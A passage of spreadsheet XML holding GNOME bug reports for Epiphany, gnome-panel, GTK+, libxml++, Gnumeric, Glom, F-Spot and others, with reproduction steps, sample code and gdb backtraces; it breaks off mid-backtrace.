------- Bug created by bug-buddy at 2006-03-21 02:11 -------
Unknown version 2.14.0 in product epiphany.  Setting version to 2.14.x.
</t>
  </si>
  <si>
    <t>gegesy.zsombor</t>
  </si>
  <si>
    <t>GALEON-99286</t>
  </si>
  <si>
    <t>middle clicking on smart bookmarks doesn't use the text</t>
  </si>
  <si>
    <t>when i middle click on a smart bookmark (e.g. google search) after entering
something in the corresponding text entry it doesn't use the text but
instead only loads the smart bookmark url with a %s
To reproduce:
1. enter test in the google smart bookmarks entry
2. middle click the smart bookmark
expected result:
a new tab is opened with a google search for test
actual result:
a new tab is opened with a google search for %s</t>
  </si>
  <si>
    <t>GNOME-PANEL-87436</t>
  </si>
  <si>
    <t>autohide panel comes up on exiting terminal</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-panel
Severity: minor
Version: 2.0.1.0.200207041722-0.snap.ximian.1
Synopsis: autohide panel comes up on exiting terminal
Bugzilla-Product: gnome-panel
Bugzilla-Component: Panel
Description:
Description of Problem:
Exiting gnome-terminal causes panel to pop up.
Steps to reproduce the problem:
1. set autohide on
2. run gnome-terminal
3. press ^D
Actual Results:
panel comes up
Expected Results:
panel should stay down
How often does this happen?
always
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-07-05 11:14 -------
Unknown version 1.0.x in product gnome-panel. Setting version to the default unspecified.
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-408673</t>
  </si>
  <si>
    <t>Localization module needs a tango-styled icon</t>
  </si>
  <si>
    <t>Historically we've used national flag for this but we'd rather avoid that for political reasons. Either we use two flat-color non-existant flags or use the UN flag. 
I believe the Mac went with the UN flag and it will be more likely recognisable than the other option.</t>
  </si>
  <si>
    <t>METACITY-120756</t>
  </si>
  <si>
    <t>gok main menu shrinking</t>
  </si>
  <si>
    <t>using gnome-2.4 nightly from 26/08/03
.logged in as normal user.
It appears that if GOK displays a UI Grab menu with a large number of
buttons when it reverts back to main the window has got smaller. If you
return to the same largely populated UI Grab menu and revert again the
main menu is smaller still.  
e.g.
- run StarOffice
- run GOK
- launch a new text document
- hit UI Grab and a large number of widgtes are available
- click back to go to main menu and it has shrunk smaller even as far as
making the buttons illegible.</t>
  </si>
  <si>
    <t>GTK+-164347</t>
  </si>
  <si>
    <t>undefined reference to 'gtk_plug_new' on mingw/msys</t>
  </si>
  <si>
    <t>I am trying to compile librsvg-2.8.1 wuth mingw/msys on windows. I have
installed the required packages for gtk etc. from Tor Lillqvist's page and from
gnuwin32.
Running configure with no options.
Make fails trying to create rsvg-view.exe:
rsvg_view-test-display.o(.text+0x7ca): In function `view_pixbuf':
I:/programs/msys/1.0/home/librsvg-2.8.1/test-display.c:406: undefined reference
to `gtk_plug_new`
grep -r gtk_plug_new /mingw/libs 
produces no results.</t>
  </si>
  <si>
    <t>roger.light</t>
  </si>
  <si>
    <t>GTK+-101975</t>
  </si>
  <si>
    <t>GtkColorSelectionDialog doesn't set window title</t>
  </si>
  <si>
    <t>GtkColorSelectionDialog doesn't have a (translated) default window title. 
This is inconsistent with GtkFontSelectionDialog which does set a title.
Patch attached.</t>
  </si>
  <si>
    <t>LIBXML++-131018</t>
  </si>
  <si>
    <t>xmlpp::Document::write_to_stream() fails when output size exceeds 4000 bytes</t>
  </si>
  <si>
    <t>xmlpp::Document::write_to_stream() fails when output size exceeds 4000
bytes. After 4000 bytes it outputs again xml header ('&lt;? xml ...'). I
reprocuced this behaviour with both stable (1.0.0) and development (2.5.0)
version. Initially I found this ordid tests when libxml2-2.5.11 were
installed. Upgrade to libxml2-2.6.4 doesn't change anything.
Also: both xmlpp::Document::write_to_file() and
xmlpp::Document::write_to_string() works correctly. Behaviour is exactly
the same in case of formatted output functions
Here is simple example in which I reproduced this problem:
--------------------------------------------------
#include 
#include 
#include 
using namespace xmlpp
Document * gen_doc (void)
{
   Document * doc = new Document
   Element * root = doc-&gt;create_root_node (Test)
   for (int i=0 i&lt;20 i++)
   {
      Node * n1 = root-&gt;add_child (foo)
      for (int k=0 k&lt;20 k++)
          n1-&gt;add_child (bar)-&gt;add_child_text(baz)
   }
   return doc
}
int main (void)
{
   Document * doc = gen_doc ()
   std::ofstream ofs (foo.xml)
   std::cout &lt;&lt; length= 
	     write_to_string(UTF-8).length()
	     &lt;&lt; std::endl
   doc-&gt;write_to_stream (ofs UTF-8)
   return 0
}
--------------------------------------------------
I got more that 4 Mb output to file while write_to_string()
returned only 5873 bytes.
Problem doesn't seem to be Linux specific as I got identical output to file
for target i586-pc-msdosdjgpp (had built libxml2-2.6.3 and libxml++-1.0.0
for it)
Andris</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS-454544</t>
  </si>
  <si>
    <t>File browser actions not appearing translated</t>
  </si>
  <si>
    <t>The actions in the file browser plugins context menu and in it's navigation bar are marked for translation but they do not appear translated.</t>
  </si>
  <si>
    <t>TOMBOY-158576</t>
  </si>
  <si>
    <t>deleted note still appears in the Search list</t>
  </si>
  <si>
    <t>Search for notes. Open one of the notes found in the search. Delete the note.
The note is still in the list of results from the search and if you try to open
it you get an empty window (no crash though which is good). When you delete the
note it should disappear from the list of search results.</t>
  </si>
  <si>
    <t>GNOMEICU-101158</t>
  </si>
  <si>
    <t>gnomeicu-client readmsg doesn't save message to history</t>
  </si>
  <si>
    <t>Running latest CVS as of today on Ximian unstable gnome 2.1X
gnomeicu-client readmsg should save the read message into the history for
that user.  I believe that messages read with readmsg are just thrown away now.
Also when the message is read this way the icon beside the username in the
main window disappears it should be restored correctly.
It would be good if the displayed message had the formatting stripped away.
 Perhaps there is a reason that this is left there? - if so it would be
nice if it were optional.</t>
  </si>
  <si>
    <t>damon.brodie</t>
  </si>
  <si>
    <t>PANGO-132282</t>
  </si>
  <si>
    <t>uninstalled .pc files broken</t>
  </si>
  <si>
    <t>The uninstalled .pc files need to be updated to include
the API version in the library names for example
pangox.la instead of pangox-1.0.la.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-104060</t>
  </si>
  <si>
    <t>Preferred applications capplet is not session aware</t>
  </si>
  <si>
    <t>Steps to reproduce the problem.
-Invoke the 'Prefered applications' capplet
 (Desktop Preferences -&gt; Advanced -&gt; Prefered applications).
-Save the session and log out by choosing 'Actions -&gt; Logout' and
 and check the 'Save current setup' option.
-Login again.
Prefered applications capplet will not be present.</t>
  </si>
  <si>
    <t>EOG-118010</t>
  </si>
  <si>
    <t>Collection view doesn't use global image view settings</t>
  </si>
  <si>
    <t>The image display part in the collection view doesn't use the settings from
the image view.</t>
  </si>
  <si>
    <t>EVOLUTION-201984</t>
  </si>
  <si>
    <t>double-click kills Evolution</t>
  </si>
  <si>
    <t>1) Select a mail
2) With the right pop-up menu choose move
3) In the mail folder dialog double-click a mail folder
EVOLUTION CRASHES
Strangely selecting a mail folder and then clicking OK doesn't cause a crash.</t>
  </si>
  <si>
    <t>thayne</t>
  </si>
  <si>
    <t>GNUMERIC-118030</t>
  </si>
  <si>
    <t>Segfault when making graphs very small</t>
  </si>
  <si>
    <t>Gnumeric 1.1.19 built with bonobo support segfaults every time I do the
following:
1. Create a new graph using the Graph Guru. In my case I put Apple
Banana and Cherry in one column and 30% 45% and 25% in
another then made a pie chart.
2. Place the graph as usual.
3. Resize the graph as small as you possibly can.
=&gt; When resized down to virtually nothing gnumeric segfaults.
NOTE: Run gdb from outside X (or on another box) because X will be locked
and you won't be able to focus the terminal running gdb when this crash
occurs. If you do lock yourself kill gdb and all will be well again.
Gnumeric prints many asserts while resizing graphs. Here is the last round
of asserts and a backtrace.
** (gnumeric:16003): WARNING **: size_allocate GogGraphView 0x8707300 : x =
0 y
 = 0 w = 0 h = 7
** (gnumeric:16003): WARNING **: size_allocate GogChartView 0x8707bf8 : x =
1 y
 = 1 w = -2 h = 5
** (gnumeric:16003): WARNING **: size_allocate GogPieView 0x8707dd8 : x =
2 y =
 2 w = -4 h = 3
** (gnumeric:16003): WARNING **: rend_pixbuf:update = 1
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 16384 (LWP 16003)]
0x40ae7027 in gdk_pixbuf_get_pixels () from /usr/lib/libgdk_pixbuf-2.0.so.0
(gdb) bt
#0  0x40ae7027 in gdk_pixbuf_get_pixels () from /usr/lib/libgdk_pixbuf-2.0.so.0
#1  0x081d8196 in gog_renderer_begin_drawing (rend=0x0) at gog-renderer.c:163
#2  0x081d95a8 in gog_renderer_pixbuf_update (prend=0x8707888 w=0
    h=141588616 zoom=0) at gog-renderer-pixbuf.c:449
#3  0x081d9cd1 in gog_control_foocanvas_update (item=0x8677a88 i2w_dx=0
    i2w_dy=0 flags=0) at gog-control-foocanvas.c:197
#4  0x081f2ec2 in foo_canvas_item_invoke_update (item=0x8677a88 i2w_dx=45
    i2w_dy=16 flags=1) at foo-canvas.c:430
#5  0x081f4d09 in foo_canvas_group_update (item=0x85c98a0 i2w_dx=0 i2w_dy=0
    flags=1) at foo-canvas.c:1380
#6  0x081f2ec2 in foo_canvas_item_invoke_update (item=0x85c98a0 i2w_dx=45
    i2w_dy=16 flags=1) at foo-canvas.c:430
#7  0x081f4d09 in foo_canvas_group_update (item=0x85c9638 i2w_dx=0 i2w_dy=0
    flags=1) at foo-canvas.c:1380
#8  0x081f2ec2 in foo_canvas_item_invoke_update (item=0x85c9638 i2w_dx=45
    i2w_dy=16 flags=0) at foo-canvas.c:430
#9  0x081f7ad1 in do_update (canvas=0x85c9638) at foo-canvas.c:2908
#10 0x081f7bba in idle_handler (data=0x0) at foo-canvas.c:2934
#11 0x40fba6c3 in g_idle_dispatch () from /usr/lib/libglib-2.0.so.0
#12 0x40fba9c0 in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
#13 0x40fb8d68 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#14 0x40fbae8b in g_main_context_iterate () from /usr/lib/libglib-2.0.so.0
#15 0x40fb935f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
---Type  to continue or q  to quit---
#16 0x4094d75f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#17 0x08149591 in main (argc=0 argv=0x40a6a858) at main-application.c:227
#18 0x410167a7 in __libc_start_main () from /lib/libc.so.6
(gdb)
Hope this helps!</t>
  </si>
  <si>
    <t>kenny</t>
  </si>
  <si>
    <t>GLOM-525188</t>
  </si>
  <si>
    <t>Error on creating date or time field</t>
  </si>
  <si>
    <t>in a new table setting a new field's type to date or time pops up a dialog and prevents further commits to the database until next restart of glom
With the time field the missing function is to_timestamp the rest of the error is similar.
ERROR:  function to_date(numeric unknown) does not exist at character 39
HINT:  No function matches the given name and argument types. You might need to add explicit type casts.
STATEMENT:  UPDATE pig SET glom_temp_column = to_date( piggy 'YYYYMMDD' )
Internal Error (Base_DB::handle_error()): exception type=N5Gnome3Gda15ConnectionErrorE ex.what()=ERROR:  function to_date(numeric unknown) does not exist
LINE 1: UPDATE pig SET glom_temp_column = to_date( piggy 'YYY...
                                              ^
HINT:  No function matches the given name and argument types. You might need to add explicit type casts.
ERROR:  current transaction is aborted commands ignored until end of transaction block</t>
  </si>
  <si>
    <t>F-SPOT-377548</t>
  </si>
  <si>
    <t>Rotate functionality corrupts EXIF data</t>
  </si>
  <si>
    <t>Please describe the problem:
Using the rotate functionality causes image EXIF data to be corrupted.  Ideally the applicaiton would offer a choice of _only_ editing the EXIF orientation flag doing the rotation non-destructively (as requested in Bug#301819) or doing a full lossless image and thumbnail rotation.  Now it looks like it's just changing the rotation flag and along the way is corrupting other EXIF data.
This bug can be shown with images from a Nikon CoolPix 2500.  Rotating one of its images changes (using EXIF.py/exiftool field names):
- various EXIF offsets
- EXIF UserComment from nulls to ASCII and some nulls.  Why?
- Image DateTime to current image time.  This should arguably be done since the image is being updated but I would prefer the option to leave it alone.
- Image Orientation to the requested orientation.
- Image Software from in this case E2500v1.0 to f-spot version 0.2.2.  This is another field I think should be optionally changed.  I would prefer to keep the original camera data stored here.
- various MakerNote fields.  They all look corrupted with random crap.  This is _bad_.
- The image size also shrinks by ~30k for unknown reasons after a rotation.
Steps to reproduce:
1. Load image in f-spot
2. Click one of the rotate buttons
3. Examine EXIF data
Actual results:
Image is rotated via EXIF orientation flag other EXIF data is modified or corrupted.
Expected results:
EXIF orientation flag changed everything else left exactly the same.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>dlehn</t>
  </si>
  <si>
    <t>EVOLUTION-201181</t>
  </si>
  <si>
    <t>Separate focus and selection in the folder tree view</t>
  </si>
  <si>
    <t>It should be possible to move around without opening all the folders you are
visiting with the cursor.</t>
  </si>
  <si>
    <t>ATK-353130</t>
  </si>
  <si>
    <t>crash in Power Management: The Information window w...</t>
  </si>
  <si>
    <t>Version: @VERSION@
What were you doing when the application crashed?
The Information window was open and I right-clicked the notification icon and selected Preferences and it crashed
Distribution: Ubuntu 6.06 (dapper)
Gnome Release: 2.15.92 2006-08-26 (GARNOME)
BugBuddy Version: 2.15.92
Memory status: size: 123604992 vsize: 123604992 resident: 19718144 share: 13168640 rss: 19718144 rss_rlim: -1
CPU usage: start_time: 1156706132 rtime: 68 utime: 56 stime: 12 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/opt/garnome-2.15.x/bin/gnome-power-preferences'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 46912587976336 (LWP 12553)]
0x00002aaaafc5c094 in waitpid () from /lib/libpthread.so.0
#0  0x00002aaaafc5c094 in waitpid () from /lib/libpthread.so.0
#1  0x00002aaaaac1bce0 in libgnomeui_segv_handle (signum=5)
    at gnome-ui-init.c:867
#2  
#3  IA__g_logv (log_domain=0x0 log_level= 
    format=0x2aaaafdc51a5 %s: assertion `%s' failed args1=0x7fffffcf6420)
    at gmessages.c:503
#4  0x00002aaaafd9bd03 in IA__g_log (log_domain=0x8a7b40 \020|\212 
    log_level=9075520 format=0x8a7c10  ) at gmessages.c:517
#5  0x00002aaab06c2bc0 in gail_notebook_real_remove_gtk (
    container= widget= 
    data=) at gailnotebook.c:555
#6  0x00002aaaaf7b0980 in IA__g_closure_invoke (closure=0x603330 
    return_value=0x0 n_param_values=2 param_values=0x7fffffcf6810 
    invocation_hint=0x7fffffcf66d0) at gclosure.c:490
#7  0x00002aaaaf7c0d65 in signal_emit_unlocked_R (node=0x522e40 detail=0 
    instance=0x6020a0 emission_return=0x0 
    instance_and_params=0x7fffffcf6810) at gsignal.c:2438
#8  0x00002aaaaf7c24e4 in IA__g_signal_emit_valist (instance=0x6020a0 
    signal_id= detail=0 var_args=0x7fffffcf6a90)
    at gsignal.c:2197
#9  0x00002aaaaf7c2863 in IA__g_signal_emit (instance=0x8a7b40 
    signal_id=9075520 detail=9075728) at gsignal.c:2241
#10 0x0000000000409102 in gpm_prefs_init (prefs=0x5b7280)
    at gpm-prefs-core.c:1015
#11 0x00002aaaaf7d1533 in IA__g_type_create_instance (type=46912581763024)
    at gtype.c:1567
#12 0x00002aaaaf7b623d in g_object_constructor (type=9075520 
    n_construct_properties=9075520 construct_params=0x8a7c10)
    at gobject.c:1015
#13 0x00002aaaaf7b67dd in IA__g_object_newv (object_type=6028320 
    n_parameters=0 parameters=0x0) at gobject.c:912
#14 0x00002aaaaf7b71de in IA__g_object_new_valist (object_type=6028320 
    first_property_name=0x0 var_args=0x7fffffcf70b0) at gobject.c:955
#15 0x00002aaaaf7b7411 in IA__g_object_new (object_type=6028320 
    first_property_name=0x0) at gobject.c:793
#16 0x0000000000409322 in gpm_prefs_new () at gpm-prefs-core.c:1050
#17 0x00000000004077f8 in main (argc=1 argv=)
    at gpm-prefs.c:104
Thread 1 (Thread 46912587976336 (LWP 12553)):
#0  0x00002aaaafc5c094 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x00002aaaaac1bce0 in libgnomeui_segv_handle (signum=5)
    at gnome-ui-init.c:867
	estatus = 0
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {0 0 0 0 0 0 46912583004793 8992064 
      46912583004793 8992064 46912581761968 0 0 0 0 0}} sa_flags = 0 
  sa_restorer = 0}
	pid = -512
#2  
No symbol table info available.
#3  IA__g_logv (log_domain=0x0 log_level= 
    format=0x2aaaafdc51a5 %s: assertion `%s' failed args1=0x7fffffcf6420)
    at gmessages.c:503
	depth = 1
	domain = 
	data = (gpointer) 0x0
	log_func = (GLogFunc) 0x2aaaafd9c3e0 
	domain_fatal_mask = 9075520
	test_level = 9075520
	was_fatal = 0
	was_recursion = 0
	i = 
#4  0x00002aaaafd9bd03 in IA__g_log (log_domain=0x8a7b40 \020|\212 
    log_level=9075520 format=0x8a7c10  ) at gmessages.c:517
	args = {{gp_offset = 40 fp_offset = 48 
    overflow_arg_area = 0x7fffffcf6500 reg_save_area = 0x7fffffcf6440}}
#5  0x00002aaab06c2bc0 in gail_notebook_real_remove_gtk (
    container= widget= 
    data=) at gailnotebook.c:555
	gail_notebook = (GailNotebook *) 0x56c940
	obj = (AtkObject *) 0x0
	index = -1
	__PRETTY_FUNCTION__ = gail_notebook_real_remove_gtk
#6  0x00002aaaaf7b0980 in IA__g_closure_invoke (closure=0x603330 
    return_value=0x0 n_param_values=2 param_values=0x7fffffcf6810 
    invocation_hint=0x7fffffcf66d0) at gclosure.c:490
	marshal = (
    GClosureMarshal) 0x2aaaaf7be100 
	marshal_data = (gpointer) 0x0
	in_marshal = 0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#7  0x00002aaaaf7c0d65 in signal_emit_unlocked_R (node=0x522e40 detail=0 
    instance=0x6020a0 emission_return=0x0 
    instance_and_params=0x7fffffcf6810) at gsignal.c:2438
	tmp = 
	handler = (Handler *) 0x5fd750
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x0 instance = 0x6020a0 ihint = {signal_id = 78 
    detail = 0 run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN 
  chain_type = 4}
	class_closure = (GClosure *) 0x522dd0
	handler_list = (Handler *) 0x5fd750
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 78
	max_sequential_handler_number = 1615
	return_value_altered = 1
#8  0x00002aaaaf7c24e4 in IA__g_signal_emit_valist (instance=0x6020a0 
    signal_id= detail=0 var_args=0x7fffffcf6a90)
    at gsignal.c:2197
	_cvalue = 
	_flags = 
	_vtable = 
	_cvalues = {{v_int = 1 v_long = 1 v_int64 = 1 
    v_double = 4.9406564584124654e-324 v_pointer = 0x1} {
    v_int = -1431563448 v_long = 46912496210760 v_int64 = 46912496210760 
    v_double = 2.3177852738394171e-310 v_pointer = 0x2aaaaaac1348} {
    v_int = -3183904 v_long = 140737485171424 v_int64 = 140737485171424 
    v_double = 6.9533556505292457e-310 v_pointer = 0x7fffffcf6ae0} {
    v_int = -3183968 v_long = 140737485171360 v_int64 = 140737485171360 
    v_double = 6.9533556505260837e-310 v_pointer = 0x7fffffcf6aa0} {
    v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {
    v_int = 228478885 v_long = 228478885 v_int64 = 228478885 
    v_double = 1.128835678786129e-315 v_pointer = 0xd9e4fa5} {
    v_int = 4203797 v_long = 4203797 v_int64 = 4203797 
    v_double = 2.0769516797904947e-317 v_pointer = 0x402515} {
    v_int = -1431622333 v_long = 46912496151875 v_int64 = 46912496151875 
    v_double = 2.3177852709301115e-310 v_pointer = 0x2aaaaaab2d43}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 46912576934064 data = {{v_int = 8079712 
      v_uint = 8079712 v_long = 8079712 v_ulong = 8079712 
      v_int64 = 8079712 v_uint64 = 8079712 v_float = 1.1322088e-38 
      v_double = 3.9919081274912698e-317 v_pointer = 0x7b4960} {
      v_int = -3183920 v_uint = 4291783376 v_long = 140737485171408 
      v_ulong = 140737485171408 v_int64 = 140737485171408 
      v_uint64 = 140737485171408 v_float = -nan(0x4f6ad0) 
      v_double = 6.9533556505284552e-310 v_pointer = 0x7fffffcf6ad0}}}
	error = 
	instance_and_params = (GValue *) 0x7fffffcf6810
	stack_values = {{g_type = 5751328 data = {{v_int = 6299808 
        v_uint = 6299808 v_long = 6299808 v_ulong = 6299808 
        v_int64 = 6299808 v_uint64 = 6299808 v_float = 8.82791128e-39 
        v_double = 3.1125187081958517e-317 v_pointer = 0x6020a0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 5714480 data = {{v_int = 7863680 v_uint = 7863680 
        v_long = 7863680 v_ulong = 7863680 v_int64 = 7863680 
        v_uint64 = 7863680 v_float = 1.10193627e-38 
        v_double = 3.8851741378888936e-317 v_pointer = 0x77fd80} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 46912540695131 data = {{
        v_int = -3184368 v_uint = 4291782928 v_long = 4291782928 
        v_ulong = 4291782928 v_int64 = 4291782928 v_uint64 = 4291782928 
        v_float = -nan(0x4f6910) v_double = 2.1204225041327561e-314 
        v_pointer = 0xffcf6910} {v_int = -3183920 v_uint = 4291783376 
        v_long = 140737485171408 v_ulong = 140737485171408 
        v_int64 = 140737485171408 v_uint64 = 140737485171408 
        v_float = -nan(0x4f6ad0) v_double = 6.9533556505284552e-310 
        v_pointer = 0x7fffffcf6ad0}}} {g_type = 7954096 data = {{
        v_int = -1340893120 v_uint = 2954074176 v_long = 46912586881088 
        v_ulong = 46912586881088 v_int64 = 46912586881088 
        v_uint64 = 46912586881088 v_float = -5.36946487e-10 
        v_double = 2.3177897535488333e-310 v_pointer = 0x2aaab0139840} {
        v_int = 4 v_uint = 4 v_long = 4 v_ulong = 4 v_int64 = 4 
        v_uint64 = 4 v_float = 5.60519386e-45 
        v_double = 1.9762625833649862e-323 v_pointer = 0x4}}} {
    g_type = 46912586881088 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0} {v_int = 40 v_uint = 40 v_long = 40 
        v_ulong = 40 v_int64 = 40 v_uint64 = 40 v_float = 5.60519386e-44 
        v_double = 1.9762625833649862e-322 v_pointer = 0x28}}} {
    g_type = 35089 data = {{v_int = 10487536 v_uint = 10487536 
        v_long = 10487536 v_ulong = 10487536 v_int64 = 10487536 
        v_uint64 = 10487536 v_float = 1.46961681e-38 
        v_double = 5.1815312471233234e-317 v_pointer = 0xa006f0} {
        v_int = 7713952 v_uint = 7713952 v_long = 7713952 
        v_ulong = 7713952 v_int64 = 7713952 v_uint64 = 7713952 
        v_float = 1.08095491e-38 v_double = 3.8111986768683755e-317 
        v_pointer = 0x75b4a0}}} {g_type = 46912585009698 data = {{
        v_int = 40 v_uint = 40 v_long = 40 v_ulong = 40 v_int64 = 40 
        v_uint64 = 40 v_float = 5.60519386e-44 
        v_double = 1.9762625833649862e-322 v_pointer = 0x28} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 40 data = {{
        v_int = 5993088 v_uint = 5993088 v_long = 5993088 
        v_ulong = 5993088 v_int64 = 5993088 v_uint64 = 5993088 
        v_float = 8.39810501e-39 v_double = 2.9609788933034246e-317 
        v_pointer = 0x5b7280} {v_int = 7726896 v_uint = 7726896 
        v_long = 7726896 v_ulong = 7726896 v_int64 = 7726896 
        v_uint64 = 7726896 v_float = 1.08276875e-38 
        v_double = 3.8175938625881446e-317 v_pointer = 0x75e730}}} {
    g_type = 46912583085264 data = {{v_int = -3184188 v_uint = 4291783108 
        v_long = 140737485171140 v_ulong = 140737485171140 
        v_int64 = 140737485171140 v_uint64 = 140737485171140 
        v_float = -nan(0x4f69c4) v_double = 6.9533556505152143e-310 
        v_pointer = 0x7fffffcf69c4} {v_int = 9098528 v_uint = 9098528 
        v_long = 9098528 v_ulong = 9098528 v_int64 = 9098528 
        v_uint64 = 9098528 v_float = 1.27497533e-38 
        v_double = 4.4952701125246652e-317 v_pointer = 0x8ad520}}} {
    g_type = 0 data = {{v_int = -1431623229 v_uint = 2863344067 
        v_long = 46912496150979 v_ulong = 46912496150979 
        v_int64 = 46912496150979 v_uint64 = 46912496150979 
        v_float = -3.040468e-13 v_double = 2.3177852708858432e-310 
        v_pointer = 0x2aaaaaab29c3} {v_int = 268435457 v_uint = 268435457 
        v_long = 140733461823489 v_ulong = 140733461823489 
        v_int64 = 140733461823489 v_uint64 = 140733461823489 
        v_float = 2.5243552e-29 v_double = 6.9531568707296507e-310 
        v_pointer = 0x7fff10000001}}} {g_type = 46912583161817 data = {{
        v_int = 3 v_uint = 3 v_long = 3 v_ulong = 3 v_int64 = 3 
        v_uint64 = 3 v_float = 4.20389539e-45 
        v_double = 1.4821969375237396e-323 v_pointer = 0x3} {
        v_int = -1344769373 v_uint = 2950197923 v_long = 46912583004835 
        v_ulong = 46912583004835 v_int64 = 46912583004835 
        v_uint64 = 46912583004835 v_float = -3.93716254e-10 
        v_double = 2.3177895620364891e-310 v_pointer = 0x2aaaafd872a3}}} {
    g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0} {v_int = -1388157376 v_uint = 2906809920 
        v_long = 46912539616832 v_ulong = 46912539616832 
        v_int64 = 46912539616832 v_uint64 = 46912539616832 
        v_float = -1.10503273e-11 v_double = 2.3177874183843167e-310 
        v_pointer = 0x2aaaad426640}}} {g_type = 46912539492864 data = {{
        v_int = -1388395632 v_uint = 2906571664 v_long = 46912539378576 
        v_ulong = 46912539378576 v_int64 = 46912539378576 
        v_uint64 = 46912539378576 v_float = -1.08436732e-11 
        v_double = 2.3177874066129062e-310 v_pointer = 0x2aaaad3ec390} {
        v_int = 76 v_uint = 76 v_long = 76 v_ulong = 76 v_int64 = 76 
        v_uint64 = 76 v_float = 1.06498683e-43 
        v_double = 3.7548989083934737e-322 v_pointer = 0x4c}}} {
    g_type = 5619520 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0} {v_int = -3183968 v_uint = 4291783328 
        v_long = 140737485171360 v_ulong = 140737485171360 
        v_int64 = 140737485171360 v_uint64 = 140737485171360 
        v_float = -nan(0x4f6aa0) v_double = 6.9533556505260837e-310 
        v_pointer = 0x7fffffcf6aa0}}} {g_type = 4198024 data = {{
        v_int = 228478885 v_uint = 228478885 v_long = 228478885 
        v_ulong = 228478885 v_int64 = 228478885 v_uint64 = 228478885 
        v_float = 9.75667552e-31 v_double = 1.128835678786129e-315 
        v_pointer = 0xd9e4fa5} {v_int = 4203797 v_uint = 4203797 
        v_long = 4203797 v_ulong = 4203797 v_int64 = 4203797 
        v_uint64 = 4203797 v_float = 5.89077428e-39 
        v_double = 2.0769516797904947e-317 v_pointer = 0x402515}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0x7fffffcf6828
	node = (SignalNode *) 0x522e40
	i = 1
	n_params = 1
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#9  0x00002aaaaf7c2863 in IA__g_signal_emit (instance=0x8a7b40 
    signal_id=9075520 detail=9075728) at gsignal.c:2241
	var_args = {{gp_offset = 32 fp_offset = 48 
    overflow_arg_area = 0x7fffffcf6b70 reg_save_area = 0x7fffffcf6ab0}}
#10 0x0000000000409102 in gpm_prefs_init (prefs=0x5b7280)
    at gpm-prefs-core.c:1015
	main_window = (GtkWidget *) 0x5e0070
	widget = 
	notebook = (GtkWidget *) 0x6020a0
	delay = 
	page = 2
	hal = 
	power_button_actions = {0x40ca36 interactive 0x40b3ab suspend 
  0x40c9fe hibernate 0x40ca08 shutdown 0x0}
#11 0x00002aaaaf7d1533 in IA__g_type_create_instance (type=46912581763024)
    at gtype.c:1567
	node = (TypeNode *) 0x5bfc20
	instance = (GTypeInstance *) 0x5b7280
	class = (GTypeClass *) 0x5bfce0
	i = 1
#12 0x00002aaaaf7b623d in g_object_constructor (type=9075520 
    n_construct_properties=9075520 construct_params=0x8a7c10)
    at gobject.c:1015
	object = (GObject *) 0x2aaaafdb0791
#13 0x00002aaaaf7b67dd in IA__g_object_newv (object_type=6028320 
    n_parameters=0 parameters=0x0) at gobject.c:912
	cparams = (GObjectConstructParam *) 0x8a7c10
	oparams = 
	nqueue = 
	object = 
	class = (GObjectClass *) 0x5bfce0
	unref_class = (GObjectClass *) 0x5bfce0
	slist = (GSList *) 0x0
	n_total_cparams = 0
	n_cparams = 0
	n_oparams = 0
	n_cvalues = 0
	cvalues = 
	clist = (GList *) 0x0
	i = 6028320
	__PRETTY_FUNCTION__ = IA__g_object_newv
